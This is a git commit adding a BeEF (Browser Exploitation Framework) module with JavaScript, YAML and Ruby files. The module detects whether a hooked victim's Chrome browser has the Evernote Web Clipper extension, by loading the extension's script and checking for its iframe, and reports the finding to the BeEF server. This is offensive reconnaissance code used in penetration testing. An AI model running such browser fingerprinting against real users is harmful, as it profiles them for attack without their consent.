Detect the presense of Evernotes Clipper Extension in Chrome

2014-05-07 19:11:27 +08:00
parent 0ec566ac95
commit 55e36ff095
3 changed files with 64 additions and 0 deletions
--- a/modules/browser/detect_evernote_clipper/command.js
+++ b/modules/browser/detect_evernote_clipper/command.js
@@ -0,0 +1,34 @@
 //
 // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 beef.execute(function() {
 	var result = "";
 	var s = document.createElement('script');
 	s.onload = function() {
 		result = "Detected through presense of extension content script.";
 		beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+result);
 	}
 	s.src = 'chrome-extension://pioclpoplcdbaefihamjohnefbikjilc/content/frame.js';
 	document.body.appendChild(s);
 	var evdiv = document.getElementById('evernoteGlobalTools');
 	if (typeof(evdiv) != 'undefined' && evdiv != null) {
 		// Evernote Web Clipper must have been active as well, because we can detect one of the iFrames
 		iframeresult = "Detected evernoteGlobalTools iFrame. Looks like the Web Clipper has been used on this page";
 		beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+iframeresult);
 	}
 	setTimeout(function() {
 		if (result == "") {
 			beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper=Not Detected");
 		}	
 		document.body.removeChild(s);
 		}, 2000);
 });
--- a/modules/browser/detect_evernote_clipper/config.yaml
+++ b/modules/browser/detect_evernote_clipper/config.yaml
@@ -0,0 +1,16 @@
 #
 # Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 beef:
    module:
        detect_evernote_clipper:
            enable: true
            category: "Browser"
            name: "Detect Evernote Web Clipper"
            description: "This module checks if the Evernote Web Clipper extension is installed and active."
            authors: ["xntrik"]
            target:
                 not_working: ["IE"]
                 working: ["C"]
--- a/modules/browser/detect_evernote_clipper/module.rb
+++ b/modules/browser/detect_evernote_clipper/module.rb
@@ -0,0 +1,14 @@
 #
 # Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 class Detect_evernote_clipper < BeEF::Core::Command
 	def post_execute 
 		content = {}
 		content['evernote_clipper'] = @datastore['evernote_clipper'] if not @datastore['evernote_clipper'].nil?
 		save content
 	end
 end